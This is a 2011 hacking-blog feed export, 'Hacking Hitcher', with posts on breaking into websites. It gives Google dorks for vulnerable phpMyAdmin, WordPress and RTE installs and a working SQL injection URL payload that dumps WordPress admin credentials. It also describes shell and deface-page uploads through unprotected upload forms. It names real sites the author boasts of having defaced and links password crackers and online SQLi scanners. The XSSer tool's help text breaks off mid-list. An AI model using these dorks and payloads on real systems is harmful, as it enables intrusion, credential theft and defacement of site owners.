tag:blogger.com,1999:blog-88761652293238197272024-03-13T14:45:31.693-07:00Hacking HitcherUnknownnoreply@blogger.comBlogger105125tag:blogger.com,1999:blog-8876165229323819727.post-39947252907684873102011-11-17T11:29:00.000-08:002011-11-17T11:36:41.745-08:00phpmyadmin exploit<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghhDTksyD09mXHEl6cJDD0-ghWoxAP8pucOZNydNxVhI0rZW16eYxkwIGZiuxPsWRWr1b3ui-3xEDP-nzwqUkAk6CNm3KGGmKtDab1ClSMDYdCQX8-P9vuS8YR5QxCvHefSDNjXEhVhWNQ/s1600/phpmyadmin.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 200px; height: 142px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghhDTksyD09mXHEl6cJDD0-ghWoxAP8pucOZNydNxVhI0rZW16eYxkwIGZiuxPsWRWr1b3ui-3xEDP-nzwqUkAk6CNm3KGGmKtDab1ClSMDYdCQX8-P9vuS8YR5QxCvHefSDNjXEhVhWNQ/s200/phpmyadmin.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5676050911133915074" /></a><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', Times, serif; font-size: 13px; line-height: 18px; background-color: rgb(255, 255, 255); "><h3 class="post-title entry-title" style="margin-top: 0px; padding-right: 0px; padding-left: 0px; color: rgb(43, 152, 212); font-size: 20px; font-family: Georgia; text-decoration: none; margin-right: 0px; margin-bottom: 5px; margin-left: 0px; padding-top: 10px; padding-bottom: 0px; "><a href="http://www.devilscafe.in/2011/11/phpmyadmin-exploit.html" style="color: rgb(43, 126, 196); text-decoration: none; font-size: 20px; font-family: Georgia; margin-top: 0px; margin-right: 0px; margin-bottom: 5px; margin-left: 0px; padding-top: 10px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; ">phpmyadmin exploit</a></h3><div><br /></div></span><span class="Apple-style-span" style="background-color: rgb(255, 255, 255); "><span class="Apple-style-span" style="font-size: 13px; line-height: 18px; color: red; font-family: Arial, Helvetica, sans-serif; "><b>Dork : allinurl:index.php?db=information_schema</b></span><br /><span class="Apple-style-span" style="font-size: 13px; line-height: 18px; font-family: Arial, Helvetica, sans-serif; "><b><br /></b></span><br /><span class="Apple-style-span" style="font-size: 13px; line-height: 18px; font-family: Arial, Helvetica, sans-serif; "><b>Enter Above Dork in Google it will show more 161,000 results</b></span><br /><b><span class="Apple-style-span" ><span class="Apple-style-span" style="line-height: 18px;">which will be vulnerable by this Dork</span></span></b><br /><span class="Apple-style-span" style="font-size: 13px; line-height: 18px; font-family: Arial, Helvetica, sans-serif; "><b><br /></b></span><br /><span class="Apple-style-span" style="font-size: 13px; line-height: 18px; font-family: Arial, Helvetica, sans-serif; "><b>This dork bypasses the admin username and password and Which will be takes directly to information schema tables to get data and You can delete data to ......</b></span></span><div><span class="Apple-style-span" style="background-color: rgb(255, 255, 255); "><span class="Apple-style-span" style="font-size: 13px; line-height: 18px; font-family: Arial, Helvetica, sans-serif; "><b><br /></b></span></span></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-30034274908784406592011-11-15T10:13:00.000-08:002011-11-15T10:29:05.227-08:00WordPress Exploit<div>Exploit Wordpress "/easy-comment-uploads/upload-form.php".</div><div><br /></div><div>Find Out Sites from this Dork </div><div><br /></div><div>Dork : "/easy-comment-uploads/upload-form.php"</div><div><br /></div><div><br /></div><div>*|_Exploit_|*</div><div><br /></div><div>http://[localhost]/[path]/easy-comment-uploads/upload-form.php</div><div>http://[localhost]/easy-comment-uploads/upload-form.php</div><div><br /></div><div>For example </div><div><a href="http://eleventigers.net/111/wp-content/plugins/easy-comment-uploads/upload-form.php">http://eleventigers.net/111/wp-content/plugins/easy-comment-uploads/upload-form.php</a></div><div><br /></div><div>File Extention [.txt],[.jpg],[gif],[bmp]</div><div><br /></div><div><br /></div><div>Preview Your Upload Page </div><div>In my case i upload hitcher1.jpg</div><div><a href="http://eleventigers.net/111/wp-content/uploads/2011/11/hitcher1.jpg">http://eleventigers.net/111/wp-content/uploads/2011/11/hitcher1.jpg</a></div><div><br /></div><div>site/wp-content/uploads/[years]/[month]/[yourshell]</div><div>example: site/wp-content/uploads/2011/06/404.php;.txt</div><div><br /></div><div>For example hacked links </div><div><br /></div><div><div>_____________________________________________________</div><div>http://www.punjabicomments.co.cc/wp-content/uploads/2011/11/hitcher1.jpg</div><div>http://www.deathvalleymag.com/wp-content/uploads/2011/11/hitcher1.jpg</div><div>http://www.serpholicmedia.com/wp-content/uploads/2011/11/hitcher1.jpg</div><div>http://eleventigers.net/111/wp-content/uploads/2011/11/hitcher1.jpg</div><div>http://www.recycledbride.com/blog/wp-content/uploads/2011/11/hitcher1.jpg</div><div>http://www.recycledbride.com/blog/wp-content/uploads/2011/11/hitcher1.jpg</div><div>http://www.mysodes.tv/wp-content/uploads/2011/11/hitcher1.jpg</div><div>http://objekt.com.au/wp-content/uploads/2011/11/hitcher1.jpg</div><div>http://h00rj.com/wp-content/uploads/2011/11/hitcher1.jpg</div><div>http://www.chetthedog.com/wp-content/uploads/2011/11/hitcher1.jpg</div><div>http://maratona.mobi/wp-content/wp-content/uploads/2011/11/hitcher1.jpg</div></div><div>____________________________________________________</div><div><br /></div><div><br /></div>Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-8876165229323819727.post-54136956800160900482011-11-14T07:47:00.001-08:002011-11-14T08:14:20.818-08:00WordPress Blog Exploit<div><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 18px; ">First of all use Google Dork to find out such Sites </span></span></div><span class="Apple-style-span" style="color: rgb(255, 255, 255); font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; background-color: rgb(33, 33, 33); "><div><span class="Apple-style-span" style="color: rgb(255, 255, 255); font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; background-color: rgb(33, 33, 33); "><br /></span></div><div><span class="Apple-style-span" style="color: rgb(255, 255, 255); font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; background-color: rgb(33, 33, 33); "><br /></span></div>Dork: <span style="font-weight: bold; ">inurl:"fbconnect_action=myhome"</span><br /><br /><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiAASPVytviZLNR0tAxJx2bc3S4yABNGORhSj33tkRTUcMgFhmK3n37R2D7VVZr-wYDMvjbcNNxrxPH1Rx6U1b1WfW1ImEH8QqyMTPNkuVHOrgmxVv_XUcNrfsu3moOGsRpbYoQzhN7QFA/s400/untitled24.JPG" border="0" alt="[Image: untitled24.JPG]" style="border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; " /><br /><br />You will be get such info of admin on page<br /><br /><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho4g4VQYa1jPc6HY_9u4MwagYEWeKq1MX6fXj7CK29Xvs6FOgojdIiBZCi50IiFkJvbTu1xrk6zak54A1fL5pCyuTsXbgs7UdUG1ibM_vMg6-1u0ryDigmZzNF6PmbRtzNt9m-ITKala3W/s400/untitled22.JPG" border="0" alt="[Image: untitled22.JPG]" style="border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; " /><br /><br />Just change this part of URL :<br /><span style="font-weight: bold; ">?fbconnect_action=myhome&userid=</span><br /><br />With This part of URL :<br /><span style="font-weight: bold; ">?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--</span><br /><br /><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyUsRhEu1OQe5nZl42EWKNEJmKgZ3cKQd1EQC1f41zBDVjqqbUXn0qznLmlIUp2VzTUB3rzLcCjo7A9eYKggfWzLzI1sazRblc2y-RffvR14-jH4TXIEQZQ4tvSoxWOZ4NwOpgdrRedkIj/s400/untitled23.JPG" border="0" alt="[Image: untitled23.JPG]" style="border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; " /><br /><br />Now You will be get Username and Password of Admin<br /><br />Than Just Encrypt Password In any MD5 Cracker </span><div><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 18px;"><br /></span></span></div><div><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 18px;"><br /></span></span><span class="Apple-style-span" style="color: rgb(34, 34, 34); font-family: arial, sans-serif; line-height: 15px; background-color: rgb(255, 255, 255); font-size: small; "><h3 class="r" style="font-size: medium; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; display: block; overflow-x: hidden; overflow-y: hidden; text-overflow: ellipsis; white-space: nowrap; "><br /></h3><div><br /></div><div><br /></div></span></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-38935096347445876932011-11-04T08:19:00.000-07:002011-11-04T09:00:48.528-07:00Rte Remote File Upload Vulnerability<span class="Apple-style-span" style="-webkit-text-decorations-in-effect: none; background-color: rgb(255, 255, 255); "><b>Rte Remote File Upload Vulnerability found in many sites</b></span><div><span class="Apple-style-span"><b><br /></b></span><div><b><span class="Apple-style-span" style="font-family: 'Trebuchet MS'; line-height: 18px; background-color: rgb(255, 255, 255); font-size: medium; ">To find which site's are Vulnerable </span><span class="Apple-style-span" style="font-family: 'Trebuchet MS'; line-height: 18px; background-color: rgb(255, 255, 255); ">Use following G</span></b><span class="Apple-style-span" style="font-family: 'Trebuchet MS'; line-height: 18px; background-color: rgb(255, 255, 255); "><span class="Apple-style-span" style="font-size: 17px; line-height: 22px; ">oogle dorks for find such Sites</span></span><div><span class="Apple-style-span" style="font-family: 'Trebuchet MS'; line-height: 18px; background-color: rgb(255, 255, 255); "><span class="Apple-style-span" style="font-size: 17px; font-weight: bold; line-height: 22px; "><strong><br /></strong></span></span></div><div><span class="Apple-style-span" style="font-family: 'Trebuchet MS'; line-height: 18px; background-color: rgb(255, 255, 255); "><span class="Apple-style-span" style="font-size: 17px; font-weight: bold; line-height: 22px; "><strong>inurl:rte/my_documents/my_files</strong></span></span></div><div><span class="Apple-style-span" style="font-family: 'Trebuchet MS'; line-height: 18px; background-color: rgb(255, 255, 255); "><span class="Apple-style-span" style="font-size: 17px; font-weight: bold; line-height: 22px; "><strong>inurl:/my_documents/my_files/</strong></span><h3 style="color: rgb(114, 114, 114); margin-top: 0px; margin-right: 0px; margin-bottom: 10px; margin-left: 0px; font-size: 17px; "><br /></h3><h3 style="margin-top: 0px; margin-right: 0px; margin-bottom: 10px; margin-left: 0px; font-size: 17px; ">These are Exploit </h3><ul style="font-size: 11px; line-height: 22px; "><li><h3 style="color: rgb(114, 114, 114); margin-top: 0px; margin-right: 0px; margin-bottom: 10px; margin-left: 0px; font-size: 17px; "><span style="color: rgb(0, 0, 0); ">site</span><span class="Apple-style-span" style="color: rgb(0, 0, 0); ">example</span><span class="Apple-style-span" style="color: rgb(0, 0, 0); ">.com<strong>/rte/RTE_popup_file_atch.asp</strong></span></h3><h3 style="color: rgb(114, 114, 114); margin-top: 0px; margin-right: 0px; margin-bottom: 10px; margin-left: 0px; font-size: 17px; "></h3></li><li style="color: rgb(114, 114, 114); "><h3 style="margin-top: 0px; margin-right: 0px; margin-bottom: 10px; margin-left: 0px; font-size: 17px; "><span style="color: rgb(0, 0, 0); ">siteexample.com<strong>/admin/RTE_popup_file_atch.asp</strong></span></h3></li></ul><h3 style="color: rgb(114, 114, 114); margin-top: 0px; margin-right: 0px; margin-bottom: 10px; margin-left: 0px; font-size: 17px; ">Hack a a site for Example.</h3><div><a href="http://www.jrf.org.tw/newjrf/index_new.asp">http://www.jrf.org.tw/newjrf/index_new.asp</a></div><div><br /></div></span><span class="Apple-style-span" style="font-family: 'Trebuchet MS'; line-height: 18px; background-color: rgb(255, 255, 255); "> </span><span class="Apple-style-span" style="font-family: 'Trebuchet MS'; line-height: 18px; background-color: rgb(255, 255, 255); ">Remove </span><span class="Apple-style-span" style="font-family: 'Trebuchet MS'; line-height: 18px; background-color: rgb(255, 255, 255); ">/<a href="http://www.jrf.org.tw/newjrf/index_new.asp">index_new.asp</a> from it and put exploit link with it </span><span class="Apple-style-span" style="font-family: 'Trebuchet MS'; line-height: 18px; background-color: rgb(255, 255, 255); ">like </span></div><div><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 18px;"><a href="http://www.jrf.org.tw/newjrf/rte/RTE_popup_file_atch.asp">http://www.jrf.org.tw/newjrf/rte/RTE_popup_file_atch.asp</a></span></span></div><div><span class="Apple-style-span"><br /></span></div><div><span class="Apple-style-span">Now you will be get admin control area where you can upload your deface page and also your shell too in some cases like this </span></div><div><br /></div><div><span class="Apple-style-span"><br /></span></div><div><span class="Apple-style-span">Hacked link </span></div><div><span class="Apple-style-span"><a href="http://www.jrf.org.tw/newjrf/rte/my_documents/my_files/FF1_hitcher.html">http://www.jrf.org.tw/newjrf/rte/my_documents/my_files/FF1_hitcher.html</a></span></div><div><br /></div><div>Mirror</div><div><a href="http://www.zone-hack.com/defacements/?id=4365">http://www.zone-hack.com/defacements/?id=4365</a></div><div><span class="Apple-style-span"><br /></span></div><div><span class="Apple-style-span" style="font-family: 'Trebuchet MS'; line-height: 18px; background-color: rgb(255, 255, 255); "><div><br /></div></span></div></div></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-25601913644099005052011-10-22T14:48:00.000-07:002011-10-22T14:51:41.593-07:00Online SQLi Scanners<span class="Apple-style-span" style="background-color: rgb(255, 255, 255); "><p style="margin-top: 0px; padding-right: 15px; padding-left: 15px; "><span class="Apple-style-span" ><span class="Apple-style-span" style="line-height: 18px;">Online SQLi Scanners</span></span></p></span><span class="Apple-style-span" style="color: rgb(43, 152, 212); font-family: Georgia, 'Times New Roman', Times, serif; font-size: 13px; line-height: 18px; background-color: rgb(255, 255, 255); "> <a href="http://scanner.drie88.tk/" style="text-decoration: underline; ">http://scanner.drie88.tk/</a></span><span class="Apple-style-span" style="background-color: rgb(255, 255, 255); "><p style="font-family: Georgia, 'Times New Roman', Times, serif; font-size: 13px; line-height: 18px; margin-top: 0px; padding-right: 15px; padding-left: 15px; "><span class="Apple-style-span" ><u><a href="http://wolfscps.com/gscanner.php">http://wolfscps.com/gscanner.php</a></u></span><br /><span class="Apple-style-span" ><u><a href="http://cattuong.net/">http://cattuong.net/</a></u></span><br /><span class="Apple-style-span" ><u><a href="http://www.sunmagazin.com/tools/hack/SQLI-Scan/">http://www.sunmagazin.com/tools/hack/SQLI-Scan/</a></u></span><br /><span class="Apple-style-span" ><u><a href="http://www.be007.gigfa.com/scanner/scanner.php">http://www.be007.gigfa.com/scanner/scanner.php</a></u></span><br /><span class="Apple-style-span" ><u><a href="http://localvn.biz/Tools/tools/Hack-Shop/SQLI-Scan/">http://localvn.biz/Tools/tools/Hack-Shop/SQLI-Scan/</a></u></span><br /><br /></p><div class="separator" style="font-family: Georgia, 'Times New Roman', Times, serif; font-size: 13px; line-height: 18px; clear: both; text-align: center; "><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzYfkhYAfY1TP7HHQk3JhWUF0WnzYVFBI5hchc5n6Fx8iGKalPCbli43t0vKdVWBZHVArG5g5nIGPld82JaO9VE2SEHErgCm8GOzxJUhTsXZOrSKs2_XIdLcMEfQw3oZj5CXYEKG8w0NE/s1600/sql.gif" imageanchor="1" style="color: rgb(43, 152, 212); text-decoration: none; margin-left: 1em; margin-right: 1em; "><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzYfkhYAfY1TP7HHQk3JhWUF0WnzYVFBI5hchc5n6Fx8iGKalPCbli43t0vKdVWBZHVArG5g5nIGPld82JaO9VE2SEHErgCm8GOzxJUhTsXZOrSKs2_XIdLcMEfQw3oZj5CXYEKG8w0NE/s400/sql.gif" width="400" style="border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-width: initial; border-color: initial; border-top-width: 6px; border-right-width: 6px; border-bottom-width: 6px; border-left-width: 6px; border-top-color: rgb(217, 217, 217); border-right-color: rgb(217, 217, 217); border-bottom-color: rgb(217, 217, 217); border-left-color: rgb(217, 217, 217); " /></a></div></span>Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-8876165229323819727.post-54445871674209848272011-10-22T14:35:00.000-07:002011-10-22T14:42:12.891-07:00Password Breaking Tools 2011 Link Updated<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 18px; background-color: rgb(255, 255, 255); font-size: small; ">Using this password hacking kit you will be able to crack a lot of passwords like Windows Admin password, pdf passwords, zip files passwords, document passwords, rar passwords and much more</span><div><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 18px; background-color: rgb(255, 255, 255); font-size: small; "><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', Times, serif; font-size: 13px; "><div class="separator" style="clear: both; font-family: Arial, Helvetica, sans-serif; text-align: center; "><span style="font-size: small; "><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWO4kroGGI60a7VnSFwWuOgWvO9Yp9HcNuUgXvlnal0vk17WUHJMqBM74WXSKv3CAFgEehqgyLvA6-9ZBaSZxjzh0IcA6qnq86WrhlIxRYmTrqg8g2ChyphenhyphenqpVuwG_SYVE3dxAgY3Iebo4Ua/s1600/Password+Hacking+and+Breaking+Tools.jpg" style="color: rgb(43, 152, 212); text-decoration: underline; margin-left: 1em; margin-right: 1em; "><img alt="best hacking tools, password crackers, password hacking softwares" border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWO4kroGGI60a7VnSFwWuOgWvO9Yp9HcNuUgXvlnal0vk17WUHJMqBM74WXSKv3CAFgEehqgyLvA6-9ZBaSZxjzh0IcA6qnq86WrhlIxRYmTrqg8g2ChyphenhyphenqpVuwG_SYVE3dxAgY3Iebo4Ua/s320/Password+Hacking+and+Breaking+Tools.jpg" width="320" style="border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-width: initial; border-color: initial; border-top-width: 6px; border-right-width: 6px; border-bottom-width: 6px; border-left-width: 6px; border-top-color: rgb(217, 217, 217); border-right-color: rgb(217, 217, 217); border-bottom-color: rgb(217, 217, 217); border-left-color: rgb(217, 217, 217); " /></a></span></div><span style="font-size: small; "><span style="font-family: Arial, Helvetica, sans-serif; "></span></span><div style="font-family: Arial, Helvetica, sans-serif; "><span style="font-size: small; "><span><br /></span></span></div><span style="font-size: small; "><span style="font-family: Arial, Helvetica, sans-serif; "></span></span><div style="font-family: Arial, Helvetica, sans-serif; "><span style="font-size: small; "><span><br /></span></span></div><span style="font-size: small; "><span style="font-family: Arial, Helvetica, sans-serif; "></span></span><div style="font-family: Arial, Helvetica, sans-serif; "><span style="font-size: small; "><span>Following Password Breaking Tools:</span></span></div><span style="font-size: small; "><span style="font-family: Arial, Helvetica, sans-serif; "></span></span><div style="font-family: Arial, Helvetica, sans-serif; "><span style="font-size: small; "><span>1. PDF Password Remover</span></span></div><span style="font-size: small; "><span style="font-family: Arial, Helvetica, sans-serif; "></span></span><div style="font-family: Arial, Helvetica, sans-serif; "><span style="font-size: small; "><span>2. <span class="IL_AD" id="IL_AD1">Windows XP</span> Admin Password <span class="IL_AD" id="IL_AD10">Remover</span></span></span></div><span style="font-size: small; "><span style="font-family: Arial, Helvetica, sans-serif; "></span></span><div style="font-family: Arial, Helvetica, sans-serif; "><span style="font-size: small; "><span>3. <span class="IL_AD" id="IL_AD9">Zip File</span> Password Cracker.</span></span></div><span style="font-size: small; "><span style="font-family: Arial, Helvetica, sans-serif; "></span></span><div style="font-family: Arial, Helvetica, sans-serif; "><span style="font-size: small; "><span>4. SQL Password Remover</span></span></div><span style="font-size: small; "><span style="font-family: Arial, Helvetica, sans-serif; "></span></span><div style="font-family: Arial, Helvetica, sans-serif; "><span style="font-size: small; "><span>5. Microsoft Office Password Remover.</span></span></div><span style="font-size: small; "><span style="font-family: Arial, Helvetica, sans-serif; "></span></span><div style="font-family: Arial, Helvetica, sans-serif; "><span style="font-size: small; "><span>6. Microsoft Windows Vista Password Remover.</span></span></div><span style="font-size: small; "><span style="font-family: Arial, Helvetica, sans-serif; "></span></span><div style="font-family: Arial, Helvetica, sans-serif; "><span style="font-size: small; "><span>7. Rar File Password Cracker</span></span></div><span style="font-size: small; "><span style="font-family: Arial, Helvetica, sans-serif; "></span></span><div style="font-family: Arial, Helvetica, sans-serif; "><span style="font-size: small; "><span>8. Windows <span class="IL_AD" id="IL_AD11">Password Recovery</span> Kit</span></span></div><span style="font-size: small; "><span style="font-family: Arial, Helvetica, sans-serif; "></span></span><div style="font-family: Arial, Helvetica, sans-serif; "><span style="font-size: small; "><span>9. Password Changer.</span></span></div><span style="font-size: small; "><span style="font-family: Arial, Helvetica, sans-serif; "></span></span><div style="font-family: Arial, Helvetica, sans-serif; "><span style="font-size: small; "><span>10. Distributed File Password Recovery..</span></span></div><span style="font-size: small; "><span style="font-family: Arial, Helvetica, sans-serif; "></span></span><div style="font-family: Arial, Helvetica, sans-serif; "><span style="font-size: small; "><span>and much more</span></span></div></span></span><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 18px; background-color: rgb(255, 255, 255); font-size: small; ">Downloading link <a href="http://www.ziddu.com/download/14527424/Password_Cracker_Tools.rar.html">click here </a></span><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 18px; background-color: rgb(255, 255, 255); font-size: small; "><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', Times, serif; font-size: 13px; "><div style="font-family: Arial, Helvetica, sans-serif; "><span style="font-size: small; "><span><br /></span></span></div></span></span></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-66894728096487289192011-09-04T01:53:00.000-07:002011-09-04T01:58:56.382-07:00Automatic Tool Pentesting XSS Attacks<span class="Apple-style-span" style="color: rgb(84, 84, 84); font-family: Arial, Verdana; font-size: 12px; background-color: rgb(255, 255, 255); "><h3 class="post-title entry-title" style="color: rgb(53, 53, 53); margin-top: 0px; margin-right: 0px; margin-bottom: 10px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Georgia, 'Times New Roman Times', serif; font-size: 24px; line-height: 24px; ">
<br /></h3><div class="post-body entry-content" style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 10px; padding-bottom: 5px; padding-left: 10px; font-family: Arial, Verdana; font-size: 12px; line-height: 20px; "><p></p><div style="border-top-left-radius: 15px 15px; border-top-right-radius: 15px 15px; border-bottom-right-radius: 15px 15px; border-bottom-left-radius: 15px 15px; border-top-color: rgb(104, 104, 104); border-right-color: rgb(104, 104, 104); border-bottom-color: rgb(104, 104, 104); border-left-color: rgb(104, 104, 104); border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; padding-top: 10px; padding-right: 10px; padding-bottom: 10px; padding-left: 10px; "><div id="element" style="height: 500px; overflow-x: auto; overflow-y: auto; "><b><u>Introduction</u></b>
<br />
<br /><b>Cross Site "Scripter"</b> is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based aplications.
<br />
<br />It contains several options to try to bypass certain filters, and various special techniques of code injection.
<br />
<br /><b><u>Usage</u></b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">xsser [OPTIONS] [-u |-i |-d ] [-g |-p |-c ] [Request(s)] [Vector(s)] [Bypasser(s)] [Technique(s)] [Final Injection(s)]</blockquote>
<br /><b><u>Options:</u></b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">--version<span class="Apple-tab-span" style="white-space: pre; "> </span>show program's version number and exit
<br />-h, --help<span class="Apple-tab-span" style="white-space: pre; "> </span>show this help message and exit
<br />-s, --statistics<span class="Apple-tab-span" style="white-space: pre; "> </span>show advanced statistics output results
<br />-v, --verbose<span class="Apple-tab-span" style="white-space: pre; "> </span>verbose (default: no)
<br />--gtk<span class="Apple-tab-span" style="white-space: pre; "> </span>launch XSSer GTK Interface</blockquote>
<br /><b><u>*Special Features*:</u></b>
<br />You can choose Vector(s) and Bypasser(s) to inject code with this extra special features:
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">--imx=IMX<span class="Apple-tab-span" style="white-space: pre; "> </span>create a false image with XSS code embedded
<br />--fla=FLASH<span class="Apple-tab-span" style="white-space: pre; "> </span>create a false .swf file with XSS code embedded</blockquote>
<br /><b><u>*Select Target(s)*:</u></b>
<br />At least one of these options has to be specified to set the source to get target(s) urls from.
<br />You need to choose to run XSSer:
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">-u URL, --url=URL<span class="Apple-tab-span" style="white-space: pre; "> </span>Enter target(s) to audit
<br />-i READFILE<span class="Apple-tab-span" style="white-space: pre; "> </span>Read target URLs from a file
<br />-d DORK<span class="Apple-tab-span" style="white-space: pre; "> </span>Process search engine dork results as target urls
<br />--De=DORK_ENGINE<span class="Apple-tab-span" style="white-space: pre; "> </span>Search engine to use for dorking (bing, altavista,
<br />yahoo, baidu, yandex, youdao, webcrawler, ask, etc.
<br />See dork.py file to check for available engines)</blockquote>
<br /><b><u>*Select type of HTTP/HTTPS Connection(s)*:</u></b>
<br />These options can be used to specify which parameter(s) we want to use like payload to inject code.
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">-g GETDATA<span class="Apple-tab-span" style="white-space: pre; "> </span>Enter payload to audit using GET. (ex: '/menu.php?q=')
<br />-p POSTDATA<span class="Apple-tab-span" style="white-space: pre; "> </span>Enter payload to audit using POST. (ex: 'foo=1&bar=')
<br />-c CRAWLING<span class="Apple-tab-span" style="white-space: pre; "> </span>Number of urls to crawl on target(s): 1-99999
<br />--Cw=CRAWLING_WIDTH<span class="Apple-tab-span" style="white-space: pre; "> </span>Deeping level of crawler: 1-5
<br />--Cl<span class="Apple-tab-span" style="white-space: pre; "> </span>Crawl only local target(s) urls (default TRUE)</blockquote>
<br /><b><u>*Configure Request(s)*:</u></b>
<br />These options can be used to specify how to connect to target(s) payload(s).
<br />You can select multiple:
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">--cookie=COOKIE<span class="Apple-tab-span" style="white-space: pre; "> </span>Change your HTTP Cookie header
<br />--user-agent=AGENT<span class="Apple-tab-span" style="white-space: pre; "> </span>Change your HTTP User-Agent header (default SPOOFED)
<br />--referer=REFERER<span class="Apple-tab-span" style="white-space: pre; "> </span>Use another HTTP Referer header (default NONE)
<br />--headers=HEADERS<span class="Apple-tab-span" style="white-space: pre; "> </span>Extra HTTP headers newline separated
<br />--auth-type=ATYPE<span class="Apple-tab-span" style="white-space: pre; "> </span>HTTP Authentication type (value Basic or Digest)
<br />--auth-cred=ACRED<span class="Apple-tab-span" style="white-space: pre; "> </span>HTTP Authentication credentials (value name:password)
<br />--proxy=PROXY<span class="Apple-tab-span" style="white-space: pre; "> </span>Use proxy server (tor: http://localhost:8118)
<br />--timeout=TIMEOUT<span class="Apple-tab-span" style="white-space: pre; "> </span>Select your Timeout (default 30)
<br />--delay=DELAY<span class="Apple-tab-span" style="white-space: pre; "> </span>Delay in seconds between each HTTP request (default 8)
<br />--threads=THREADS<span class="Apple-tab-span" style="white-space: pre; "> </span>Maximum number of concurrent HTTP requests (default 5)
<br />--retries=RETRIES<span class="Apple-tab-span" style="white-space: pre; "> </span>Retries when the connection timeouts (default 3)</blockquote>
<br /><b><u>*Select Vector(s)*:</u></b>
<br />These options can be used to specify a XSS vector source code to inject in each payload.
<br />Important, if you don't want to try to inject a common XSS vector, used by default.
<br />Choose only one option:
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">--payload=SCRIPT<span class="Apple-tab-span" style="white-space: pre; "> </span>OWN - Insert your XSS construction -manually-
<br />--auto<span class="Apple-tab-span" style="white-space: pre; "> </span>AUTO - Insert XSSer 'reported' vectors from file</blockquote>
<br /><b><u>*Select Bypasser(s)*:</u></b>
<br />These options can be used to encode selected vector(s) to try to bypass all possible anti-XSS filters on target(s) code and some IPS rules, if the target use it.
<br />Also, can be combined with other techniques to provide encoding:
<br />
